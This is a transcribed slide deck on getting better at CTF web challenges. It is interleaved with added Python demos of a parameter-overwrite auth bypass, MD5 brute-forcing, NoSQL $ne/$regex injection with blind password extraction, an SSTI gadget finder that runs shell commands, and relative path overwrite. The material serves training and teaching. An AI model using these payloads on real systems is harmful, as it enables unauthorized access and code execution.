How to strengthen the CTF Web field for beginners !!
You are studying the CTF web field, but are you worried that you still can't solve problems in an actual contest?
For those with such worries, I will explain how to strengthen the web field based on my experience.
(study group) https://yahoo-osaka.connpass.com/event/149524/
1. How to strengthen the CTF Web field
for beginners
2019/10/16
Panasonic Corporation
Product Security Center
Verification Measures Department
Tomohisa Maeda
『Mix Leap Study #52 - The forefront of cyber security』
2. Self-introduction
■Name: Tomohisa Maeda
Twitter: @kazkiti_ctf
■Career
Graduated from a graduate school of mechanical engineering
Joined Panasonic Corporation
・Design/manufacturing quality consultant: 9 years
・System engineer (SIer): 2 years
・Security engineer: 5.5 years (current)
Engaged in vulnerability assessment, threat analysis, design support, etc.
3. Career and achievements such as CTF
■Career and achievements such as CTF
(Timeline figure, 2015 to 2019: started CTF in Japan; started CTF around the world; entered the SECCON domestic finals; Medical security hacking contest in Japan (second place, second place, championship); started bug bounty; established our CTF team (Pwnasonic))
5. Why did I decide to do CTF?
Since becoming a security engineer
Year zero: I was actually a beginner who didn't even know what a Cookie was …
↓
Acquired basic technical skills through vulnerability assessment work
First year: carrying out vulnerability assessment work by myself …
I was always worried, "Am I missing vulnerabilities?"
I felt that web application vulnerability assessment is deep
↓
Further technical improvement is required!
Concentrate resources on web apps! (selection and concentration)
↓
I chose the CTF Web field as a way to grow:
"enjoy improving technical skills and make use of them in business"
6. When I started the CTF Web field
■Features of the CTF Web field
・The range of topics is too wide!
・There are too many types of vulnerabilities!
↓
・So I didn't know where to start!
(Slide word cloud) PHP, Python, Node.js, Ruby, Java, Perl, MySQL, SQLite, PostgreSQL, MSSQL, Oracle, NoSQL, LDAP, SQL, XPATH, SSTI, XSS, LFI, RFI, SSRF, XXE, serialization, CVE, HTML, CSS, JavaScript, JSON, XML, Apache, nginx, IIS, Windows, Linux, OAuth 2.0, OIDC, SAML, SSO, JWT, AWS S3, CloudFront, Lambda
7. The study method I tried at first (failure story)
■My failure story
・Since SQL injection appears frequently, I started studying with the goal
"Let's be able to solve 100% of the SQL injection problems!"
↓
・However, SQL injection is deep, and I fell into a quagmire ...
9. Purpose / Means / Resource reservation
■Purpose
Improve technical skills and make use of them in business
■Means
Play CTFs around the world to build up experience
Site that summarizes CTF schedules around the world: http://ctftime.org
■Resource reservation
Prepare to dedicate every weekend to CTF
※CTFs are mostly held on weekends
10. Goal setting / quantification
■Goal setting ※How far do you want to be able to solve?
Difficulty (accuracy rate [%]) = (number of teams that solved the problem) / (number of teams that solved at least one problem) × 100
■Approximate relationship between technical skills and difficulty ※Measured and defined several times
Accuracy rate of the problems you can solve    Level
0-1%       World TOP10
1-5%       Japan top class
5-10%      Senior
10-20%     Intermediate
20-40%     Beginner
40-100%    Inexperienced CTF
■Grasping current ability ※Measured and defined several times
At that time I could solve every problem down to the 30% accuracy-rate difficulty ⇒ Beginner level
11. Record the accuracy rate in your write-ups (solutions) to grasp your ability
In this way I wrote down the accuracy rate of each problem and tracked my ability every day.
【Advantage】
・Strengths and weaknesses by field became clear through an objective indicator, which made it easier to take countermeasures.
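The quantification above, as an added worked example (not a tool from the talk): it computes the accuracy rate of each problem from a constructed scoreboard, maps it to the levels on slide 10, and derives per-category strengths and weaknesses the way the write-up records are meant to. The challenge names, solve counts and the inclusive upper bounds of the level bands are assumptions for illustration.

```python
# Added example, not from the talk: quantify difficulty as the talk's
# "accuracy rate" and map it to the skill levels on the slide.
# Scoreboard data below is constructed for illustration.

LEVELS = [  # (upper bound of accuracy rate in %, level name), from slide 10
    (1, "World TOP10"),
    (5, "Japan top class"),
    (10, "Senior"),
    (20, "Intermediate"),
    (40, "Beginner"),
    (100, "Inexperienced CTF"),
]


def accuracy_rate(solved_teams, active_teams):
    """Accuracy rate [%] = teams that solved the problem / teams that solved at least one."""
    if active_teams <= 0:
        raise ValueError("active_teams must be positive")
    return 100.0 * solved_teams / active_teams


def level_for(rate):
    """Level implied by being able to solve problems of this accuracy rate.
    Band boundaries are treated as inclusive upper bounds (an assumption)."""
    for upper, name in LEVELS:
        if rate <= upper:
            return name
    raise ValueError("rate must be between 0 and 100")


# Constructed scoreboard: (challenge, category, number of teams that solved it)
ACTIVE_TEAMS = 400
CHALLENGES = [
    ("simple-auth", "web", 120),
    ("md5-chain", "web", 90),
    ("nosql-login", "web", 28),
    ("ssti-blacklist", "web", 12),
    ("rpo-xss", "web", 3),
    ("baby-rop", "pwn", 60),
    ("heap-note", "pwn", 9),
]
MY_SOLVES = {"simple-auth", "md5-chain", "nosql-login", "baby-rop"}


def write_up_table(challenges=CHALLENGES, solves=MY_SOLVES, active=ACTIVE_TEAMS):
    """One row per challenge: what the talk suggests writing into each write-up."""
    rows = []
    for name, category, solved_by in challenges:
        rate = accuracy_rate(solved_by, active)
        rows.append({"challenge": name, "category": category, "rate": round(rate, 1),
                     "level": level_for(rate), "solved": name in solves})
    return rows


def ceiling_by_category(rows):
    """Per category: the lowest accuracy rate you solved (your current ceiling)
    and the highest-rate problem you failed (the next target)."""
    out = {}
    for r in rows:
        c = out.setdefault(r["category"], {"solved_min": None, "unsolved_max": None})
        if r["solved"]:
            if c["solved_min"] is None or r["rate"] < c["solved_min"]:
                c["solved_min"] = r["rate"]
        elif c["unsolved_max"] is None or r["rate"] > c["unsolved_max"]:
            c["unsolved_max"] = r["rate"]
    return out


if __name__ == "__main__":
    table = write_up_table()
    for row in table:
        print(row)
    print(ceiling_by_category(table))
```

With the constructed data the web ceiling is a 7.0% problem (Senior band) while the hardest unsolved web problem sits at 3.0%, which is exactly the kind of objective gap the slide recommends tracking.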
14. What should we do to be able to solve problems with an accuracy rate of 40-100%?
■Inexperienced CTF
・People who do not yet have much security technology
・People who have IT-related technology such as development skills
(Examples of development skills)
・Understanding the basics of websites (HTML, CSS, JavaScript, etc.)
・Ability to read and understand programming languages
・How to use git
・Configuring an HTTP server (Apache, nginx, etc.)
15. Example problem: TokyoWesterns CTF 4th 2018 (1/2)
The PHP source code (shown on the slide; not reproduced in this text) is obtained by accessing the URL
[Goal] Flag is displayed
16. Example problem: TokyoWesterns CTF 4th 2018 (2/2)
【Breakthrough point】
Ability to read code
・Set the action parameter to auth
・Set the hashed_password parameter to c019f6e5cd8aa0bbbcc6e994a54c757e
・Leave the user and pass parameters empty (so hashed_password is not overwritten)
[Goal] Flag is displayed
(Detailed explanation) https://ctftime.org/writeup/10891
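The three conditions above only work if request parameters land directly in the handler's variable scope. The following added example (my own Python emulation, not the challenge's PHP) reproduces that behaviour next to a fixed version. Assumptions: the original parsed the query string into its own scope the way PHP's parse_str() does when called with a single argument, and hashed_password is normally derived by hashing user and pass together; the target hash is the one quoted on the slide, while the flag value is a constructed placeholder.

```python
import hashlib
from urllib.parse import parse_qsl

# Added example, not the challenge's own source. Assumption: the handler
# parsed the query string straight into its variable scope (PHP parse_str()
# with one argument does this), and hashed_password is normally computed
# from user and pass. TARGET_HASH is from the slide; FLAG is a placeholder.
TARGET_HASH = "c019f6e5cd8aa0bbbcc6e994a54c757e"
FLAG = "FLAG{example-placeholder}"


def auth_vulnerable(query_string):
    """Every query parameter becomes a variable, so the client can preset hashed_password."""
    scope = dict(parse_qsl(query_string, keep_blank_values=True))
    if scope.get("action") != "auth":
        return "source"                      # the real handler printed its source here
    user = scope.get("user", "")
    pwd = scope.get("pass", "")
    if user and pwd:                         # only then is hashed_password recomputed ...
        scope["hashed_password"] = hashlib.md5((user + pwd).encode()).hexdigest()
    # ... so with user/pass empty the attacker-supplied value survives to the comparison
    if scope.get("hashed_password") == TARGET_HASH:
        return FLAG
    return "fail :("


def auth_fixed(query_string):
    """Same logic with the derived value kept out of reach of the request."""
    params = dict(parse_qsl(query_string, keep_blank_values=True))
    if params.get("action") != "auth":
        return "source"
    user = params.get("user", "")
    pwd = params.get("pass", "")
    hashed_password = None                   # never read from the request
    if user and pwd:
        hashed_password = hashlib.md5((user + pwd).encode()).hexdigest()
    return FLAG if hashed_password == TARGET_HASH else "fail :("


# The slide's three conditions as one query string
EXPLOIT = "action=auth&hashed_password=" + TARGET_HASH

if __name__ == "__main__":
    print(auth_vulnerable(EXPLOIT))          # flag
    print(auth_vulnerable(EXPLOIT + "&user=a&pass=b"))   # recomputed, fails
    print(auth_fixed(EXPLOIT))               # fails
```

Supplying user and pass as well defeats the bypass, because the recomputation overwrites the injected value; that is why the slide insists on leaving them empty.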
18. What should we do to be able to solve problems with an accuracy rate of 20-40%?
■Problems that require security knowledge/investigation
・CTFs for beginners (picoCTF, etc.)
・Problems similar to past problems (check the write-ups)
※Once a problem has appeared, it is a known problem even if its difficulty is high
・Books (Security Contest Challenge Book, etc.)
・Well-known famous vulnerabilities
※The ability to look up the attack method for a vulnerability with a CVE and solve the problem within the time limit
※People who do incident response work are good at this
19. Example problem: ENCRYPT CTF 2019 (1/2)
When accessing the URL, the HTML response shown on the slide is obtained
【Breakthrough point】
Basic knowledge of security
・The value is 32 hexadecimal digits, so it is most likely an MD5 hash (a 128-bit digest)
・MD5 cannot be computed backwards, so candidate inputs have to be hashed and compared until one matches
20. Example problem: ENCRYPT CTF 2019 (2/2)
Since the previous value was 100,
let's compute the MD5 values of 0 to 101 and send them!
[Goal] Flag was obtained
(Detailed explanation) https://ctftime.org/writeup/14332
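The two steps above (recognize the digest format, then brute-force a small candidate space) as an added example in Python; it is not the author's solver. It goes slightly beyond the slide by keying the guess on digest length for SHA-1 and SHA-256 as well, and the sample digests are constructed locally from known inputs rather than taken from the challenge.

```python
import hashlib
import re

# Added example, not the author's solver. Recognize a hex digest by its
# length, then brute-force a small candidate space as the slide does for 0..101.
HEX_LENGTH_TO_ALGO = {32: "md5", 40: "sha1", 64: "sha256"}   # 128/160/256-bit digests


def guess_algorithm(digest_hex):
    """32 hex digits is most often MD5, but length only narrows the candidates
    (other 128-bit digests exist), so treat the result as a hypothesis to test."""
    if not re.fullmatch(r"[0-9a-fA-F]+", digest_hex):
        return None
    return HEX_LENGTH_TO_ALGO.get(len(digest_hex))


def crack(digest_hex, candidates, algorithm=None):
    """Hash each candidate string and compare; returns the preimage or None."""
    algorithm = algorithm or guess_algorithm(digest_hex)
    if algorithm is None:
        raise ValueError("unrecognized digest format")
    target = digest_hex.lower()
    for cand in candidates:
        if hashlib.new(algorithm, cand.encode()).hexdigest() == target:
            return cand
    return None


def solve_round(digest_hex, previous_value):
    """The challenge's pattern: each round hides a number near the previous one,
    so try 0 .. previous_value + 1 (the slide's "0 to 101" for a previous 100)."""
    return crack(digest_hex, (str(i) for i in range(0, previous_value + 2)))


# Constructed samples standing in for what the server would send
SAMPLE_MD5 = hashlib.md5(b"101").hexdigest()
SAMPLE_SHA1 = hashlib.sha1(b"7").hexdigest()

if __name__ == "__main__":
    print(guess_algorithm(SAMPLE_MD5), solve_round(SAMPLE_MD5, 100))   # md5 101
    print(crack(SAMPLE_SHA1, (str(i) for i in range(10))))             # 7
```

In the real challenge each answer is submitted back to the server and the next digest comes from the response; solve_round is the part that runs between two requests.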
21. Have you stopped around here?
Let's aim for the next level soon!
23. What should we do to be able to solve problems with an accuracy rate of 10-20%?
■Ability to build an environment
1. Problems that cannot be solved without your own environment
(e.g. 1) SSRF problem ⇒ DNS rebinding ※a DNS server under your control is required
(e.g. 2) XSS problem ※an HTTP server under your control is required
2. Problems whose difficulty drops once you can build the environment and experiment
(e.g. 1) Problems that come with source code ※you can experiment on your own server
⇒ PHP, Python, Node.js, etc.
(e.g. 2) SQL injection ※you can experiment by setting up a SQL server
■Measures
・Set up an EC2 server with an AWS account ※free tier for 1 year
・Register a domain with DNS ※about 100 yen per year
・Know how to set up servers for various languages using container technology (Docker, etc.)
Set up various servers and experiment with them! (important)
24. Example problem: angstromCTF 2019 (1/1)
【Breakthrough point】
・Once I had set up a Node.js server, I could work out the NoSQL injection by trial and error in my own environment.
(Detailed explanation) https://ctftime.org/writeup/14922
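An added example of the trial-and-error loop described above (not the challenge's code, and in Python rather than the Node.js the author used): a tiny in-memory stand-in for MongoDB's query matching lets the operator-injection behaviour run offline, with a vulnerable login beside a fixed one and the blind $regex extraction that such a setup lets you develop before using it against the real target. The user record, field names and supported operators ($ne, $gt, $regex) are assumptions for illustration.

```python
import re
import string

# Added example, not the challenge's code. A tiny in-memory stand-in for a
# MongoDB-style query matcher, so operator injection can be run offline.
USERS = [{"username": "admin", "password": "s3cret-Pa55"}]   # constructed record


def _match(value, cond):
    """Equality for scalars; a dict is interpreted as query operators, as MongoDB does."""
    if not isinstance(cond, dict):
        return value == cond
    for op, arg in cond.items():
        if op == "$ne":
            ok = value != arg
        elif op == "$gt":
            ok = value > arg
        elif op == "$regex":
            ok = re.search(arg, value) is not None
        else:
            raise ValueError("unsupported operator " + op)
        if not ok:
            return False
    return True


def find_one(collection, query):
    for doc in collection:
        if all(k in doc and _match(doc[k], v) for k, v in query.items()):
            return doc
    return None


def login_vulnerable(body):
    """JSON body fields go straight into the query, so an object such as
    {"$ne": ""} is treated as an operator instead of a password string."""
    return find_one(USERS, {"username": body.get("username"),
                            "password": body.get("password")})


def login_fixed(body):
    """Reject anything but strings before the value reaches the query."""
    user, pwd = body.get("username"), body.get("password")
    if not isinstance(user, str) or not isinstance(pwd, str):
        return None
    return find_one(USERS, {"username": user, "password": pwd})


def extract_password(login, username,
                     alphabet=string.ascii_letters + string.digits + "-_"):
    """Blind extraction with $regex: grow a known prefix one character at a
    time, stopping when the anchored regex matches the whole value."""
    prefix = ""
    while True:
        if login({"username": username,
                  "password": {"$regex": "^" + re.escape(prefix) + "$"}}):
            return prefix
        for ch in alphabet:
            probe = {"username": username,
                     "password": {"$regex": "^" + re.escape(prefix + ch)}}
            if login(probe):
                prefix += ch
                break
        else:
            return None      # next character is outside the alphabet, or no injection


if __name__ == "__main__":
    print(login_vulnerable({"username": "admin", "password": {"$ne": ""}}))
    print(login_fixed({"username": "admin", "password": {"$ne": ""}}))
    print(extract_password(login_vulnerable, "admin"))
```

Against a real server the same loop is driven by HTTP requests with a JSON body; the matcher here only replaces the database so the payloads can be tuned locally first.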
26. What should we do to be able to solve problems with an accuracy rate of 5-10%?
■Comprehensive knowledge
1. Blacklist-bypass problems
・SQL injection
・OS command injection
・SSTI (Server Side Template Injection)
・Arbitrary code execution
■Measures
・Examine the relevant functions exhaustively in advance
・Check the specifications/RFCs in advance
28. Example problem: TokyoWesterns CTF 4th 2018 (2/2)
【Breakthrough point】
・Because I had exhaustively examined the functions that can lead to arbitrary code execution from SSTI, I could get around the blacklist
[Goal] Flag was obtained
(Detailed explanation) https://ctftime.org/writeup/10895
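The "examine exhaustively in advance" step, as an added example that is not the author's or the challenge's code. Jinja2 SSTI payloads reach code execution through Python's object graph (the well-known {{ ''.__class__.__mro__[1].__subclasses__() }} start); this walks the same graph from plain Python, so the list of usable classes can be built offline before a contest. The gadget name os._wrap_close and the depth limit are choices of this example; the function names are mine.

```python
import os  # imported explicitly so the gadget below is guaranteed to be loaded

# Added example, not the challenge's code. Walk Python's class graph the way a
# Jinja2 SSTI payload does and list the classes that lead to command execution.
WANTED = ("system", "popen")   # names in a module's globals that give execution


def walk_subclasses(root=object, max_depth=3):
    """Yield (depth, class) for every class reachable from root via __subclasses__()."""
    seen = set()
    stack = [(0, root)]
    while stack:
        depth, cls = stack.pop()
        if cls in seen:
            continue
        seen.add(cls)
        yield depth, cls
        if depth < max_depth:
            try:
                stack.extend((depth + 1, sub) for sub in cls.__subclasses__())
            except TypeError:     # type.__subclasses__ needs an explicit argument
                pass


def _qualname(cls):
    return "%s.%s" % (getattr(cls, "__module__", "?"), cls.__name__)


def find_gadgets(max_depth=3):
    """Classes whose __init__ is a Python function defined in a module that
    exposes os.system/os.popen through its globals (e.g. os._wrap_close)."""
    found = []
    for _, cls in walk_subclasses(max_depth=max_depth):
        init = getattr(cls, "__init__", None)
        globs = getattr(init, "__globals__", None)   # only Python functions have it
        if isinstance(globs, dict) and any(callable(globs.get(n)) for n in WANTED):
            found.append(_qualname(cls))
    return found


def gadget_globals(name="os._wrap_close"):
    """The module globals reachable from the named gadget: the dict a template
    payload would index with ['system'] or ['popen']."""
    for _, cls in walk_subclasses():
        if _qualname(cls) == name:
            return cls.__init__.__globals__
    return None


def run_through_gadget(command, name="os._wrap_close"):
    """Execute a command only via the gadget, as the final SSTI payload would."""
    return gadget_globals(name)["popen"](command).read().strip()


if __name__ == "__main__":
    for gadget in find_gadgets():
        print(gadget)
    print(run_through_gadget("echo ssti"))
```

The index of a class in __subclasses__() differs between Python versions, which is why the list is worth regenerating against the target's version; a blacklist on template keywords such as config or self removes none of these classes, only the convenient spellings of the path to them.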
30. What should we do to be able to solve problems with an accuracy rate of 1-5%?
■Ability to enumerate attack scenarios
・Rare vulnerabilities (hard to find)
・XSS and CSS injection via relative path overwrite (RPO)
・XSS via cache poisoning
・LDAP injection
・Problems combined with other fields such as binary/crypto
■Measures
・Keep every known vulnerability class in your head so you can recognize it when it appears
・Collect cutting-edge information daily
32. Example problem: Meepwn CTF Quals 2019 (2/2)
[Goal] Flag was obtained
(The final attack URL is shown on the slide)
【Breakthrough point】
・Understand XSS via relative path overwrite, which is a rare vulnerability
※After that, build the attack URL according to the conditions of the problem.
(Detailed explanation) https://ctftime.org/writeup/10442
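The resolution rule behind a relative path overwrite, as an added example (not the challenge's attack URL, which the slide shows as an image): a relative reference in a page is resolved against the directory part of the URL the browser requested, so if the server also answers for /profile/anything (PATH_INFO style routing), the page body itself becomes what the browser fetches as the stylesheet or script. The host, paths and the assumption that the route ignores the extra segment are constructed for illustration.

```python
from urllib.parse import urljoin

# Added example, not from the challenge. Demonstrates why appending a path
# segment changes where a relative reference resolves. URLs are constructed.
PAGE = "http://example.test/app/profile"
REFERENCE = "static/style.css"          # a relative reference inside the page


def resolve(page_url, reference):
    """Where a browser fetches `reference` found in a page served at `page_url`."""
    return urljoin(page_url, reference)


def is_hijacked(page_url, reference):
    """True when the resolved asset URL lies under the page's own path, i.e. the
    same route will answer it with the page body instead of the real asset."""
    page_path = page_url.split("?", 1)[0].split("#", 1)[0]
    return resolve(page_url, reference).startswith(page_path.rstrip("/") + "/")


def rpo_url(page_url, injected_segment):
    """Attacker-supplied URL: a trailing segment the route ignores but the
    browser's base-URL logic does not."""
    return page_url.rstrip("/") + "/" + injected_segment + "/"


def report(page_url=PAGE, reference=REFERENCE):
    """(requested URL, where the reference resolves, hijacked?) for the page as
    linked normally and for the RPO variant of the same page."""
    rows = []
    for url in (page_url, rpo_url(page_url, "x")):
        rows.append((url, resolve(url, reference), is_hijacked(url, reference)))
    return rows


if __name__ == "__main__":
    for row in report():
        print(row)
```

References that start with a slash are resolved from the site root and are not affected, which is the usual fix; the injection part of such a challenge is then whatever lets attacker text appear early enough in the page body to be parsed as CSS or JavaScript.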
34. What should we do to be able to solve problems with an accuracy rate of 0-1%?
Give up something important in life!
Every day,
devote yourself thoroughly
and do your very best.
First, break through at one point
by focusing on a few vulnerabilities
(Slide illustration: an XSS payload <script>alert(1)</script>, a note "What is XST ...", and a "Danger" label)
35. Example problem: Tokyo Westerns CTF 3rd 2017 (1/2)
The HTTP server is accessed via a proxy server, and the source code is given (shown on the slide).
The flag is located on another local server within the web server's network.
【Breakthrough point】
・2 years of daily study and information gathering focused on XSS
・It took 14 hours to solve this problem ...
・I feel like I lost something important in my life ...
36. Example problem: Tokyo Westerns CTF 3rd 2017 (2/2)
▼Flow up to completing the final attack code
Read the Python code, since it was given
↓
Found an XSS vulnerability in the Referer header
※Usually the Referer header is URL-encoded by the browser, so XSS through it is not possible. Here it was possible because of the special proxy.
↓
Since the flag is on a local IP address, brute-force the local IP addresses using the XSS
Network investigation found that 192.168.0.4 exists
↓
Again with the XSS, complete the final attack code to obtain the flag from 192.168.0.4
(Detailed explanation) https://ctftime.org/writeup/7461
37. Summary
Make good use of CTF
with pleasure
Let's improve our technical skills!